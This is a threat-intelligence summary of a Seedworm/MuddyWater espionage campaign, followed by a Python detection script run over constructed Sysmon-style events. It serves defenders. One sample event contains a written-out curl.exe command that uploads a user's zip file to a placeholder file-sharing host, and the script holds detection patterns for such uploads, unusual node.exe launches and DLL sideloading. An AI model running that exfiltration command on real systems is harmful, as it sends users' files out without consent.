Seedworm Expands Operations with Stealth-Focused Espionage Campaign

ThreatMon researchers identified a new espionage campaign linked to Seedworm, the Iran-aligned threat actor also known as MuddyWater and Static Kitten. The activity affected organizations across multiple industries, including manufacturing, finance, government, aviation, and education.

The campaign shows a clear shift toward stealth and operational security.

Instead of using noisy malware techniques, the attackers relied heavily on legitimate tools and trusted processes already present inside enterprise environments. The operation included DLL sideloading with signed binaries, Node.js-based execution, credential theft activity, and data exfiltration through public file-transfer services.

One of the most notable parts of the campaign was the use of signed third-party executables to load malicious DLL files. Because these binaries normally appear legitimate, they are less likely to trigger suspicion during endpoint investigations.

Researchers also observed the attackers using Node.js as part of the execution chain. This helped separate malicious activity from traditional PowerShell logging and reduced forensic visibility on compromised systems.

Credential access played a major role throughout the intrusion. The attackers extracted registry hives, targeted browser-stored credentials, abused Kerberos delegation mechanisms, and used fake Windows credential prompts to capture usernames and passwords.

For exfiltration, the operators avoided building custom infrastructure. Instead, stolen files were uploaded through public file-sharing services using curl.exe, allowing the traffic to blend into normal cloud activity.

The campaign also reflects broader geographic targeting than previously associated with Seedworm operations. Activity observed during Q1 2026 extended beyond the group’s traditional Middle East focus and included organizations in multiple global regions.

The report highlights an important trend for defenders: modern espionage campaigns increasingly rely on legitimate system activity to avoid detection.

Monitoring suspicious process relationships, unexpected Node.js execution, unusual DLL loading behavior, and unauthorized uploads to public file-sharing services may help security teams identify similar activity earlier in the attack chain.
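As an added illustration, not code from the ThreatMon report, the following Python pass runs over constructed Sysmon-style events and flags the three behaviours just listed: curl.exe uploads to a public file-sharing host, node.exe launched from an unexpected parent or a user-writable path, and a signed binary loading an unsigned DLL from a user-writable path. The file-sharing host, the expected-parent baseline and the simplified event fields are assumptions.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Constructed sample events, not real telemetry. Field names mirror Sysmon
# Event ID 1 (process create) and Event ID 7 (image load), simplified.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'curl.exe -F "file=@C:\\Users\\a\\Documents\\export.zip" https://upload.filesharing.example/api'},
    {"id": 1, "image": r"C:\Users\a\AppData\Local\Temp\node.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "cmdline": "node.exe stage.js"},
    {"id": 1, "image": r"C:\Program Files\nodejs\node.exe", "parent": r"C:\Program Files\Jenkins\jenkins.exe",
     "cmdline": "node build.js"},
    {"id": 7, "image": r"C:\Users\a\AppData\Roaming\Vendor\vendortool.exe", "signed": True,
     "loaded": r"C:\Users\a\AppData\Roaming\Vendor\version.dll", "loaded_signed": False},
    {"id": 7, "image": r"C:\Program Files\Vendor\vendortool.exe", "signed": True,
     "loaded": r"C:\Windows\System32\version.dll", "loaded_signed": True},
]

# Assumptions: a placeholder file-sharing host (the report names none) and a
# site-specific baseline of parents that legitimately launch node.exe.
PUBLIC_FILESHARE_HOSTS = {"upload.filesharing.example"}
EXPECTED_NODE_PARENTS = {"jenkins.exe", "cmd.exe", "powershell.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
UPLOAD_FLAGS = {"-F", "-T", "--upload-file", "-d", "--data", "--data-binary"}

def basename(path):
    return PureWindowsPath(path).name.lower()

def detect(ev):
    """Return the alert strings raised by one event (empty list if benign)."""
    alerts = []
    if ev["id"] == 1:
        image, parent = basename(ev["image"]), basename(ev["parent"])
        # curl.exe with an upload flag pointing at a public file-sharing host
        if image == "curl.exe" and UPLOAD_FLAGS & set(ev["cmdline"].split()):
            hosts = {urlsplit(u).hostname for u in URL_RE.findall(ev["cmdline"])}
            if hosts & PUBLIC_FILESHARE_HOSTS:
                alerts.append("curl.exe upload to public file-sharing host")
        # node.exe from a user-writable path or launched by an unexpected parent
        if image == "node.exe" and (parent not in EXPECTED_NODE_PARENTS or USER_WRITABLE.match(ev["image"])):
            alerts.append("unexpected node.exe execution")
    elif ev["id"] == 7 and ev["signed"] and not ev["loaded_signed"] and USER_WRITABLE.match(ev["loaded"]):
        alerts.append("signed binary loading unsigned DLL from user-writable path")
    return alerts

def scan(events):
    """Pair each alert with the index of the event that raised it."""
    return [(i, a) for i, ev in enumerate(events) for a in detect(ev)]
```

Running `scan(EVENTS)` flags events 0, 1 and 3 and leaves the Jenkins-launched node.exe and the System32 DLL load alone; in production the baselines above would come from the organisation's own inventory rather than these placeholders.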
